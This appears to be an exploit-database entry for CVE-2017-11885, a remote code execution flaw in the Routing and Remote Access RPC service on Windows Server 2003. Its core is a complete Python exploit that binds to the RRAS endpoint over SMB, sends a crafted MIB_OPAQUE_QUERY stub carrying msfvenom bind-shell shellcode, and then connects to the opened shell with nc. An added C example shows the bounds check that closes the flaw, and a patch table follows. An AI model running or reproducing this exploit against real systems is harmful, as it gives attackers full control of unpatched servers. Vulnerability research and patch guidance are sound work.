Microsoft Windows 2003 SP2 CVE-2017-11885 – RRAS SMB Remote Code Execution Exploit

Authors: vportal    Risk: Critical

CVE: CVE-2017-11885    0day: Remote Code Execution

0day-id: 0DAY-176176    Date: 2018-05-14

Description

A remote code execution vulnerability exists in RPC if the server has Routing and Remote Access enabled. An attacker who successfully exploited this vulnerability could execute code on the target system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.

To exploit this vulnerability, an attacker would need to run a specially crafted application against an RPC server which has Routing and Remote Access enabled. Routing and Remote Access is a non-default configuration; systems without it enabled are not vulnerable.

The security update addresses the vulnerability by correcting how the Routing and Remote Access service handles requests.

Exploit

#!/usr/bin/env python
# -*- coding: utf-8 -*-
#Tested in Windows Server 2003 SP2 (ES) - Only works when RRAS service is enabled.

#The exploited vulnerability is an arbitrary pointer dereference affecting the dwVarID field of the MIB_OPAQUE_QUERY structure.
#dwVarID (sent by the client) is used as a pointer to an array of functions. The application does not check if the pointer is
#pointing out of the bounds of the array, so it is possible to jump to specific portions of memory achieving remote code execution.
#Microsoft has not released a patch for Windows Server 2003, so consider disabling the RRAS service if you are still using
#Windows Server 2003.

#Exploit created by: Víctor Portal
#For learning purpose only

import struct
import sys
import time
import os

from threading import Thread

from impacket import smb
from impacket import uuid
from impacket import dcerpc
from impacket.dcerpc.v5 import transport

target = sys.argv[1]

print '[-]Initiating connection'
trans = transport.DCERPCTransportFactory('ncacn_np:%s[\\pipe\\browser]' % target)
trans.connect()

print '[-]connected to ncacn_np:%s[\\pipe\\browser]' % target
dce = trans.DCERPC_class(trans)

#RRAS DCE-RPC endpoint
dce.bind(uuid.uuidtup_to_bin(('8f09f000-b7ed-11ce-bbd2-00001a181cad', '0.0')))

#msfvenom -a x86 --platform windows -p windows/shell_bind_tcp lport=4444 -b "\x00" -f python
buf =  ""
buf += "\xb8\x3c\xb1\x1e\x1d\xd9\xc8\xd9\x74\x24\xf4\x5a\x33"
buf += "\xc9\xb1\x53\x83\xc2\x04\x31\x42\x0e\x03\x7e\xbf\xfc"
buf += "\xe8\x82\x57\x82\x13\x7a\xa8\xe3\x9a\x9f\x99\x23\xf8"
buf += "\xd4\x8a\x93\x8a\xb8\x26\x5f\xde\x28\xbc\x2d\xf7\x5f"
buf += "\x75\x9b\x21\x6e\x86\xb0\x12\xf1\x04\xcb\x46\xd1\x35"
buf += "\x04\x9b\x10\x71\x79\x56\x40\x2a\xf5\xc5\x74\x5f\x43"
buf += "\xd6\xff\x13\x45\x5e\x1c\xe3\x64\x4f\xb3\x7f\x3f\x4f"
buf += "\x32\x53\x4b\xc6\x2c\xb0\x76\x90\xc7\x02\x0c\x23\x01"
buf += "\x5b\xed\x88\x6c\x53\x1c\xd0\xa9\x54\xff\xa7\xc3\xa6"
buf += "\x82\xbf\x10\xd4\x58\x35\x82\x7e\x2a\xed\x6e\x7e\xff"
buf += "\x68\xe5\x8c\xb4\xff\xa1\x90\x4b\xd3\xda\xad\xc0\xd2"
buf += "\x0c\x24\x92\xf0\x88\x6c\x40\x98\x89\xc8\x27\xa5\xc9"
buf += "\xb2\x98\x03\x82\x5f\xcc\x39\xc9\x37\x21\x70\xf1\xc7"
buf += "\x2d\x03\x82\xf5\xf2\xbf\x0c\xb6\x7b\x66\xcb\xb9\x51"
buf += "\xde\x43\x44\x5a\x1f\x4a\x83\x0e\x4f\xe4\x22\x2f\x04"
buf += "\xf4\xcb\xfa\xb1\xfc\x6a\x55\xa4\x01\xcc\x05\x68\xa9"
buf += "\xa5\x4f\x67\x96\xd6\x6f\xad\xbf\x7f\x92\x4e\xae\x23"
buf += "\x1b\xa8\xba\xcb\x4d\x62\x52\x2e\xaa\xbb\xc5\x51\x98"
buf += "\x93\x61\x19\xca\x24\x8e\x9a\xd8\x02\x18\x11\x0f\x97"
buf += "\x39\x26\x1a\xbf\x2e\xb1\xd0\x2e\x1d\x23\xe4\x7a\xf5"
buf += "\xc0\x77\xe1\x05\x8e\x6b\xbe\x52\xc7\x5a\xb7\x36\xf5"
buf += "\xc5\x61\x24\x04\x93\x4a\xec\xd3\x60\x54\xed\x96\xdd"
buf += "\x72\xfd\x6e\xdd\x3e\xa9\x3e\x88\xe8\x07\xf9\x62\x5b"
buf += "\xf1\x53\xd8\x35\x95\x22\x12\x86\xe3\x2a\x7f\x70\x0b"
buf += "\x9a\xd6\xc5\x34\x13\xbf\xc1\x4d\x49\x5f\x2d\x84\xc9"
buf += "\x6f\x64\x84\x78\xf8\x21\x5d\x39\x65\xd2\x88\x7e\x90"
buf += "\x51\x38\xff\x67\x49\x49\xfa\x2c\xcd\xa2\x76\x3c\xb8"
buf += "\xc4\x25\x3d\xe9"

#NDR format
stub = "\x21\x00\x00\x00" #dwPid = PID_IP (IPv4)
stub += "\x10\x27\x00\x00" #dwRoutingPID
stub += "\xa4\x86\x01\x00" #dwMibInEntrySize
stub += "\x41"*4 #_MIB_OPAQUE_QUERY pointer
stub += "\x04\x00\x00\x00"  #dwVarID (_MIB_OPAQUE_QUERY)
stub += "\x41"*4 #rgdwVarIndex (_MIB_OPAQUE_QUERY)
stub += "\xa4\x86\x01\x00" #dwMibOutEntrySize
stub += "\xad\x0b\x2d\x06" #dwVarID ECX (CALL off_64389048[ECX*4]) -> p2p JMP EAX #dwVarID (_MIB_OPAQUE_QUERY)
stub +=  "\xd0\xba\x61\x41\x41" + "\x90"*5 + buf + "\x41"*(100000-10-len(buf)) #rgdwVarIndex (_MIB_OPAQUE_QUERY)
stub += "\x04\x00\x00\x00" #dwId (_MIB_OPAQUE_INFO)
stub += "\x41"*4 #ullAlign (_MIB_OPAQUE_INFO)


dce.call(0x1e, stub)   #0x1d MIBEntryGetFirst (other RPC calls are also affected)
print "[-]Exploit sent to target successfully..."

print "Waiting for shell..."
time.sleep(5)
os.system("nc " + target + " 4444")
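
The dwVarID bug described in the exploit's header comments, as an added example that is not part of the original exploit or of the RRAS code: a hypothetical handler table indexed the unchecked way, next to a dispatcher that validates dwVarId against the table size before indexing. Only the MIB_OPAQUE_QUERY field names follow the Windows definition; the handler table, its size and the handler functions are assumptions.

```c
/* Added example, not part of the original exploit: the dispatch pattern
 * behind CVE-2017-11885 (client-chosen dwVarId used unchecked as an index
 * into a function-pointer table) beside its range-checked form. The handler
 * table is hypothetical; MIB_OPAQUE_QUERY field names follow Windows. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
typedef uint32_t DWORD;
typedef struct _MIB_OPAQUE_QUERY {
    DWORD dwVarId;          /* client-supplied: selects the MIB handler */
    DWORD rgdwVarIndex[1];  /* client-supplied index data */
} MIB_OPAQUE_QUERY;
typedef int (*mib_handler_t)(const MIB_OPAQUE_QUERY *q);

static int get_if_table(const MIB_OPAQUE_QUERY *q)       { (void)q; return 1; }
static int get_ip_addr_table(const MIB_OPAQUE_QUERY *q)  { (void)q; return 2; }
static int get_ip_route_table(const MIB_OPAQUE_QUERY *q) { (void)q; return 3; }

/* Hypothetical stand-in for the RRAS handler table. */
static const mib_handler_t g_handlers[] = {
    get_if_table, get_ip_addr_table, get_ip_route_table,
};
#define NUM_HANDLERS (sizeof(g_handlers) / sizeof(g_handlers[0]))

/* Vulnerable pattern: slot address derived from dwVarId with no range check.
 * Only the arithmetic is shown; nothing is called through the result. */
uintptr_t unchecked_slot_address(DWORD dwVarId)
{
    return (uintptr_t)g_handlers + (uintptr_t)dwVarId * sizeof(mib_handler_t);
}

/* Fixed pattern: reject any dwVarId outside the table before indexing.
 * Returns the handler result, or -1 for a rejected request. */
int dispatch_checked(const MIB_OPAQUE_QUERY *q)
{
    if (q == NULL || q->dwVarId >= NUM_HANDLERS)
        return -1;
    return g_handlers[q->dwVarId](q);
}

int main(void)
{
    MIB_OPAQUE_QUERY ok  = { 1, { 0 } };
    MIB_OPAQUE_QUERY bad = { 0x062d0bad, { 0 } };  /* dwVarID sent by the exploit above */
    printf("dwVarId 1 -> %d; dwVarId 0x%08x -> %d (rejected)\n",
           dispatch_checked(&ok), bad.dwVarId, dispatch_checked(&bad));
    printf("unchecked slot offset: %lu bytes from table start\n",
           (unsigned long)(unchecked_slot_address(bad.dwVarId) - (uintptr_t)g_handlers));
    return 0;
}
```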

Affected Products

The following software versions or editions are affected. Versions or editions that are not listed are either past their support life cycle or are not affected. To determine the support life cycle for your software version or edition, see the Microsoft Support Lifecycle.

| Product | Article | Download | Impact | Severity | Supersedence |
|---|---|---|---|---|---|
| Windows 10 for 32-bit Systems | 4053581 | Security Update | Remote Code Execution | Important | 4048956 |
| Windows 10 for x64-based Systems | 4053581 | Security Update | Remote Code Execution | Important | 4048956 |
| Windows 10 Version 1511 for 32-bit Systems | 4053578 | Security Update | Remote Code Execution | Important | 4048952 |
| Windows 10 Version 1511 for x64-based Systems | 4053578 | Security Update | Remote Code Execution | Important | 4048952 |
| Windows 10 Version 1607 for 32-bit Systems | 4053579 | Security Update | Remote Code Execution | Important | 4048953 |
| Windows 10 Version 1607 for x64-based Systems | 4053579 | Security Update | Remote Code Execution | Important | 4048953 |
| Windows 10 Version 1703 for 32-bit Systems | 4053580 | Security Update | Remote Code Execution | Important | 4048954 |
| Windows 10 Version 1703 for x64-based Systems | 4053580 | Security Update | Remote Code Execution | Important | 4048954 |
| Windows 10 Version 1709 for 32-bit Systems | 4054517 | Security Update | Remote Code Execution | Important | 4048955 |
| Windows 10 Version 1709 for x64-based Systems | 4054517 | Security Update | Remote Code Execution | Important | 4048955 |
| Windows 7 for 32-bit Systems Service Pack 1 | 4054518 / 4054521 | Monthly Rollup / Security Only | Remote Code Execution | Important | 4048957 |
| Windows 7 for x64-based Systems Service Pack 1 | 4054518 / 4054521 | Monthly Rollup / Security Only | Remote Code Execution | Important | 4048957 |
| Windows 8.1 for 32-bit systems | 4054519 / 4054522 | Monthly Rollup / Security Only | Remote Code Execution | Important | 4048958 |
| Windows 8.1 for x64-based systems | 4054519 / 4054522 | Monthly Rollup / Security Only | Remote Code Execution | Important | 4048958 |
| Windows RT 8.1 | 4054519 | Monthly Rollup | Remote Code Execution | Important | 4048958 |
| Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) | 4052303 | Security Update | Remote Code Execution | Important | |
| Windows Server 2008 for Itanium-Based Systems Service Pack 2 | 4052303 | Security Update | Remote Code Execution | Important | |
| Windows Server 2008 for x64-based Systems Service Pack 2 | 4052303 | Security Update | Remote Code Execution | Important | |
| Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) | 4052303 | Security Update | Remote Code Execution | Important | |
| Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1 | 4054518 / 4054521 | Monthly Rollup / Security Only | Remote Code Execution | Important | 4048957 |
| Windows Server 2008 R2 for x64-based Systems Service Pack 1 | 4054518 / 4054521 | Monthly Rollup / Security Only | Remote Code Execution | Important | 4048957 |
| Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) | 4054518 / 4054521 | Monthly Rollup / Security Only | Remote Code Execution | Important | 4048957 |
| Windows Server 2012 | 4054520 / 4054523 | Monthly Rollup / Security Only | Remote Code Execution | Important | 4048959 |
| Windows Server 2012 (Server Core installation) | 4054520 / 4054523 | Monthly Rollup / Security Only | Remote Code Execution | Important | 4048959 |
| Windows Server 2012 R2 | 4054519 / 4054522 | Monthly Rollup / Security Only | Remote Code Execution | Important | 4048958 |
| Windows Server 2012 R2 (Server Core installation) | 4054519 / 4054522 | Monthly Rollup / Security Only | Remote Code Execution | Important | 4048958 |
| Windows Server 2016 | 4053579 | Security Update | Remote Code Execution | Important | 4048953 |
| Windows Server 2016 (Server Core installation) | 4053579 | Security Update | Remote Code Execution | Important | 4048953 |
| Windows Server, version 1709 (Server Core Installation) | 4054517 | Security Update | Remote Code Execution | Important | 4048955 |

Mitigations

Microsoft has not identified any mitigating factors for this vulnerability.
Workarounds

Microsoft has not identified any workarounds for this vulnerability.